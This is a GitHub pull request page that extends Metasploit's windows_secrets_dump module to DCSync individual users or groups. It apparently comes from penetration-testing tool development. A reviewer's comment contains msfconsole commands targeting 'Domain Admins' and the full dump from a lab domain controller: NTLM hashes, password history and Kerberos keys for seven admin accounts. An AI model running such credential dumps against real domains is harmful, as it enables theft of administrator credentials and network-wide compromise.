Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Dcsync individual #19643

Merged
merged 7 commits into from
Nov 18, 2024
Merged

Dcsync individual #19643

merged 7 commits into from
Nov 18, 2024

Conversation

smashery
Copy link
Contributor

@smashery smashery commented Nov 14, 2024
edited by smcintyre-r7
Loading

This PR adds some features to the windows_secrets_dump module, and fixes a bug.

  • Add the ability to perform a DCSync for an individual user or group.
  • Add the ability to only request Users (rather than also computers) or vice versa
  • Incidentally fixed a bug wherein the DC was queried multiple times for the same information, if there are other DCs present in the environment.

Requires rapid7/ruby_smb#278

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use windows_secrets_dump
  • Test the settings for KRB_TYPES (request users only, or computers only, or both)
  • Test the settings for KRB_USERS (request an individual group, or user, or a comma-separated list of either)
  • Verify the fix for the multi-DCSync query (multiple DCs should only result in a single query per user)

@smashery
Able to query just a subset of users
6c3e13a
@smashery
Support DCSyncing by group too
1705203
@smashery
Fix bug: DCSync only once, rather than once per DC that exists in the…
67c33fa 
… domain

- Also only DCSync each user once (if they're specified multiple times in KRB_USERS)
- Also be resilient to spaces in the comma-sepration
@smashery
Update documentation with new datastore options
3e3e81f
@smashery smashery mentioned this pull request Nov 14, 2024
Merged
@smcintyre-r7 smcintyre-r7 self-assigned this Nov 14, 2024
@smcintyre-r7 smcintyre-r7 added the blocked Blocked by one or more additional tasks label Nov 14, 2024
smcintyre-r7
smcintyre-r7 reviewed Nov 14, 2024
View reviewed changes
Copy link
Contributor

@smcintyre-r7 smcintyre-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Everything tested well and worked as intended. I tested all three options for KRB_TYPES and KRB_USERS being blank, an invalid name, a single username, a single group, a single name and a single group, and two names. Everything worked as intended. I've just left a couple of minor comments on this and one blocking comment on the RubySMB PR. Once the RubySMB comment is resolved, I'll land it and post a release so this can be updated with the gem bump.

modules/auxiliary/gather/windows_secrets_dump.rb Outdated Show resolved Hide resolved
@smcintyre-r7 smcintyre-r7 removed the blocked Blocked by one or more additional tasks label Nov 15, 2024
@smcintyre-r7
Copy link
Contributor

I've landed the RubySMB changes, so once this is updated to pull them in, I can get this merged too.

smcintyre-r7
smcintyre-r7 approved these changes Nov 18, 2024
View reviewed changes
Copy link
Contributor

@smcintyre-r7 smcintyre-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Everything looks ready to go now. Thanks!

metasploit-framework.pr (S:0 J:0) auxiliary(gather/windows_secrets_dump) > set KRB_TYPES USERS_ONLY
KRB_TYPES => USERS_ONLY
metasploit-framework.pr (S:0 J:0) auxiliary(gather/windows_secrets_dump) > set KRB_USERS "Domain Admins"
KRB_USERS => Domain Admins
metasploit-framework.pr (S:0 J:0) auxiliary(gather/windows_secrets_dump) > run
metasploit-framework.pr (S:0 J:0) auxiliary(gather/windows_secrets_dump) > run
[*] Running module against 192.168.159.10

[*] 192.168.159.10:445 - Opening Service Control Manager
[*] 192.168.159.10:445 - Binding to \svcctl...
[+] 192.168.159.10:445 - Bound to \svcctl
[*] 192.168.159.10:445 - Service RemoteRegistry is already running
[*] 192.168.159.10:445 - Checking NoLMHash policy
[*] 192.168.159.10:445 - LMHashes are not being stored
[*] 192.168.159.10:445 - Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] 192.168.159.10:445 - Using the DRSUAPI method to get NTDS.DIT secrets
[*] 192.168.159.10:445 - Connecting to Security Account Manager (SAM) Remote Protocol
[*] 192.168.159.10:445 - Binding to \samr...
[+] 192.168.159.10:445 - Bound to \samr
[!] 192.168.159.10:445 - Searching for specific users/groups; KRB_TYPES setting (USERS_ONLY) will be ignored
[*] 192.168.159.10:445 - Binding to DRSR...
[*] 192.168.159.10:445 - Bound to DRSR
[*] 192.168.159.10:445 - Decrypting hash for user: CN=Administrator,CN=Users,DC=msflab,DC=local
[*] 192.168.159.10:445 - Decrypting hash for user: CN=smcintyre,CN=Users,DC=msflab,DC=local
[*] 192.168.159.10:445 - Decrypting hash for user: CN=NELSON_LEE,OU=Test,OU=AWS,OU=Tier 2,DC=msflab,DC=local
[*] 192.168.159.10:445 - Decrypting hash for user: CN=ERICH_BENJAMIN,OU=ServiceAccounts,OU=HRE,OU=Tier 2,DC=msflab,DC=local
[*] 192.168.159.10:445 - Decrypting hash for user: CN=LEONA_FERRELL,OU=Devices,OU=AZR,OU=Tier 1,DC=msflab,DC=local
[*] 192.168.159.10:445 - Decrypting hash for user: CN=ROXANNE_FERNANDEZ,OU=Devices,OU=OGC,OU=Tier 2,DC=msflab,DC=local
[*] 192.168.159.10:445 - Decrypting hash for user: CN=DENNIS_HORN,OU=Test,OU=OGC,OU=Stage,DC=msflab,DC=local
# SID's:
Administrator: S-1-5-21-3978004297-3499718965-4169012971-500
smcintyre: S-1-5-21-3978004297-3499718965-4169012971-1000
msflab.local\NELSON_LEE: S-1-5-21-3978004297-3499718965-4169012971-1206
msflab.local\ERICH_BENJAMIN: S-1-5-21-3978004297-3499718965-4169012971-1235
msflab.local\LEONA_FERRELL: S-1-5-21-3978004297-3499718965-4169012971-1891
msflab.local\ROXANNE_FERNANDEZ: S-1-5-21-3978004297-3499718965-4169012971-1933
msflab.local\DENNIS_HORN: S-1-5-21-3978004297-3499718965-4169012971-3175

# NTLM hashes:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f:::
smcintyre:1000:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f:::
msflab.local\NELSON_LEE:1206:aad3b435b51404eeaad3b435b51404ee:a27489fa2d49de0812645c22fe5226cf:::
msflab.local\ERICH_BENJAMIN:1235:aad3b435b51404eeaad3b435b51404ee:25c4d19002dad9283c3ee5ae46353e8a:::
msflab.local\LEONA_FERRELL:1891:aad3b435b51404eeaad3b435b51404ee:ceb9b9285249460a9592cdbb3d51daa2:::
msflab.local\ROXANNE_FERNANDEZ:1933:aad3b435b51404eeaad3b435b51404ee:62f841c6143d785427fdbacdbbfe9df4:::
msflab.local\DENNIS_HORN:3175:aad3b435b51404eeaad3b435b51404ee:cb19688e0869ba4d7343a1c106c3ae48:::

# Full pwdump format:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f:Disabled=false,Expired=false,PasswordNeverExpires=true,PasswordNotRequired=false,PasswordLastChanged=202405131526,LastLogonTimestamp=never,IsAdministrator=true,IsDomainAdmin=true,IsEnterpriseAdmin=true::
smcintyre:1000:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f:Disabled=false,Expired=false,PasswordNeverExpires=true,PasswordNotRequired=false,PasswordLastChanged=202407311545,LastLogonTimestamp=202411111430,IsAdministrator=true,IsDomainAdmin=true,IsEnterpriseAdmin=true::
msflab.local\NELSON_LEE:1206:aad3b435b51404eeaad3b435b51404ee:a27489fa2d49de0812645c22fe5226cf:Disabled=false,Expired=false,PasswordNeverExpires=false,PasswordNotRequired=false,PasswordLastChanged=202409092124,LastLogonTimestamp=never,IsAdministrator=true,IsDomainAdmin=true,IsEnterpriseAdmin=false::
msflab.local\ERICH_BENJAMIN:1235:aad3b435b51404eeaad3b435b51404ee:25c4d19002dad9283c3ee5ae46353e8a:Disabled=false,Expired=false,PasswordNeverExpires=false,PasswordNotRequired=false,PasswordLastChanged=202409092124,LastLogonTimestamp=never,IsAdministrator=true,IsDomainAdmin=true,IsEnterpriseAdmin=false::
msflab.local\LEONA_FERRELL:1891:aad3b435b51404eeaad3b435b51404ee:ceb9b9285249460a9592cdbb3d51daa2:Disabled=false,Expired=false,PasswordNeverExpires=false,PasswordNotRequired=false,PasswordLastChanged=202409092125,LastLogonTimestamp=never,IsAdministrator=true,IsDomainAdmin=true,IsEnterpriseAdmin=false::
msflab.local\ROXANNE_FERNANDEZ:1933:aad3b435b51404eeaad3b435b51404ee:62f841c6143d785427fdbacdbbfe9df4:Disabled=false,Expired=false,PasswordNeverExpires=false,PasswordNotRequired=false,PasswordLastChanged=202409092126,LastLogonTimestamp=never,IsAdministrator=true,IsDomainAdmin=true,IsEnterpriseAdmin=false::
msflab.local\DENNIS_HORN:3175:aad3b435b51404eeaad3b435b51404ee:cb19688e0869ba4d7343a1c106c3ae48:Disabled=false,Expired=false,PasswordNeverExpires=false,PasswordNotRequired=false,PasswordLastChanged=202409092128,LastLogonTimestamp=never,IsAdministrator=true,IsDomainAdmin=true,IsEnterpriseAdmin=false::

# Account Info:
## CN=Administrator,CN=Users,DC=msflab,DC=local
- Administrator: true
- Domain Admin: true
- Enterprise Admin: true
- Password last changed: 2024-05-13 15:26:38 UTC
- Last logon: never
- Account disabled: false
- Computer account: false
- Expired: false
- Password never expires: true
- Password not required: false
## CN=smcintyre,CN=Users,DC=msflab,DC=local
- Administrator: true
- Domain Admin: true
- Enterprise Admin: true
- Password last changed: 2024-07-31 15:45:18 UTC
- Last logon: 2024-11-11 14:30:15 UTC
- Account disabled: false
- Computer account: false
- Expired: false
- Password never expires: true
- Password not required: false
## CN=NELSON_LEE,OU=Test,OU=AWS,OU=Tier 2,DC=msflab,DC=local
- Administrator: true
- Domain Admin: true
- Enterprise Admin: false
- Password last changed: 2024-09-09 21:24:32 UTC
- Last logon: never
- Account disabled: false
- Computer account: false
- Expired: false
- Password never expires: false
- Password not required: false
## CN=ERICH_BENJAMIN,OU=ServiceAccounts,OU=HRE,OU=Tier 2,DC=msflab,DC=local
- Administrator: true
- Domain Admin: true
- Enterprise Admin: false
- Password last changed: 2024-09-09 21:24:35 UTC
- Last logon: never
- Account disabled: false
- Computer account: false
- Expired: false
- Password never expires: false
- Password not required: false
## CN=LEONA_FERRELL,OU=Devices,OU=AZR,OU=Tier 1,DC=msflab,DC=local
- Administrator: true
- Domain Admin: true
- Enterprise Admin: false
- Password last changed: 2024-09-09 21:25:59 UTC
- Last logon: never
- Account disabled: false
- Computer account: false
- Expired: false
- Password never expires: false
- Password not required: false
## CN=ROXANNE_FERNANDEZ,OU=Devices,OU=OGC,OU=Tier 2,DC=msflab,DC=local
- Administrator: true
- Domain Admin: true
- Enterprise Admin: false
- Password last changed: 2024-09-09 21:26:04 UTC
- Last logon: never
- Account disabled: false
- Computer account: false
- Expired: false
- Password never expires: false
- Password not required: false
## CN=DENNIS_HORN,OU=Test,OU=OGC,OU=Stage,DC=msflab,DC=local
- Administrator: true
- Domain Admin: true
- Enterprise Admin: false
- Password last changed: 2024-09-09 21:28:42 UTC
- Last logon: never
- Account disabled: false
- Computer account: false
- Expired: false
- Password never expires: false
- Password not required: false

# Password history (pwdump format - uid:rid:lmhash:nthash:::):
No password history for Administrator
smcintyre_history0:1000:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f:::
smcintyre_history1:1000:aad3b435b51404eeaad3b435b51404ee:767f507576f1d718d788d1227c396c36:::
No password history for msflab.local\NELSON_LEE
No password history for msflab.local\ERICH_BENJAMIN
No password history for msflab.local\LEONA_FERRELL
No password history for msflab.local\ROXANNE_FERNANDEZ
No password history for msflab.local\DENNIS_HORN

# Kerberos keys:
Administrator:aes256-cts-hmac-sha1-96:2b3e29b616fc9412aea4fc96312c43152ba29c8a887300d350e064862edd387b
Administrator:aes128-cts-hmac-sha1-96:8efde83f88ce91c93da6cc1a7b00c43c
Administrator:des-cbc-md5:baa440ea8389ad92
smcintyre:aes256-cts-hmac-sha1-96:9c25f301f577e1020a5e2f27d26a89fab9b6aa759c2f56c0ebdaf73ce7e24ad1
smcintyre:aes128-cts-hmac-sha1-96:c36c675513d0bef64047470ebe46fe36
smcintyre:des-cbc-md5:23ce0de679a4b5cb
msflab.local\NELSON_LEE:aes256-cts-hmac-sha1-96:1f0d6a977419b52b0a2ceea873e4c78596ee0dbb3026ea634dabd54d89b039df
msflab.local\NELSON_LEE:aes128-cts-hmac-sha1-96:05ffee3d658d7ed6d745daf45a1700ef
msflab.local\NELSON_LEE:des-cbc-md5:9816ab0e0e100437
msflab.local\ERICH_BENJAMIN:aes256-cts-hmac-sha1-96:dc20701e1fba0c189a23d3adcb9427ec206051f786bb9d5074bd14e3b70be814
msflab.local\ERICH_BENJAMIN:aes128-cts-hmac-sha1-96:f11cfcf6dc883c2b1f57b00ce88ff0a0
msflab.local\ERICH_BENJAMIN:des-cbc-md5:c164f1133b4013b9
msflab.local\LEONA_FERRELL:aes256-cts-hmac-sha1-96:e8916dc69343a1981fc2f739e19abe5bf0c3e8f5b672050015b85ac3795b4e83
msflab.local\LEONA_FERRELL:aes128-cts-hmac-sha1-96:20d0b722338e7b934cccc22ecd5ed5c5
msflab.local\LEONA_FERRELL:des-cbc-md5:85649ed51a8f890d
msflab.local\ROXANNE_FERNANDEZ:aes256-cts-hmac-sha1-96:b61930c2c3577c36740f4e090abf1d22dc1b9c52092fec395ac0338146969ed7
msflab.local\ROXANNE_FERNANDEZ:aes128-cts-hmac-sha1-96:4682188b580f1e17bf17ab47f6772d81
msflab.local\ROXANNE_FERNANDEZ:des-cbc-md5:8f1ca7b38583f16e
msflab.local\DENNIS_HORN:aes256-cts-hmac-sha1-96:bb03b8eb55a2e213d6e61b1f8818ef1e7115ebae226f92c958fd8a51b838dd8e
msflab.local\DENNIS_HORN:aes128-cts-hmac-sha1-96:648177996d33c6d34adba2e782eed340
msflab.local\DENNIS_HORN:des-cbc-md5:9d5e5b76b6207a89

# Clear text passwords:
No clear text passwords for MSFLAB\Administrator
No clear text passwords for MSFLAB\smcintyre
No clear text passwords for MSFLAB\NELSON_LEE
No clear text passwords for MSFLAB\ERICH_BENJAMIN
No clear text passwords for MSFLAB\LEONA_FERRELL
No clear text passwords for MSFLAB\ROXANNE_FERNANDEZ
No clear text passwords for MSFLAB\DENNIS_HORN
[*] 192.168.159.10:445 - Cleaning up...
[*] Auxiliary module execution completed
metasploit-framework.pr (S:0 J:0) auxiliary(gather/windows_secrets_dump) >

@smcintyre-r7 smcintyre-r7 merged commit dd7e178 into rapid7:master Nov 18, 2024
82 checks passed
@smcintyre-r7
Copy link
Contributor

Release Notes

This updates the DOMAIN action of the auxiliary/gather/windows_secrets_dump module to allow individual users or groups to be targeted.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@smcintyre-r7 smcintyre-r7 smcintyre-r7 approved these changes

@cdelafuente-r7 cdelafuente-r7 Awaiting requested review from cdelafuente-r7

Assignees

@smcintyre-r7 smcintyre-r7

Labels
enhancement module rn-enhancement release notes enhancement
Projects
Metasploit Kanban
Archived in project
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
2 participants
@smashery @smcintyre-r7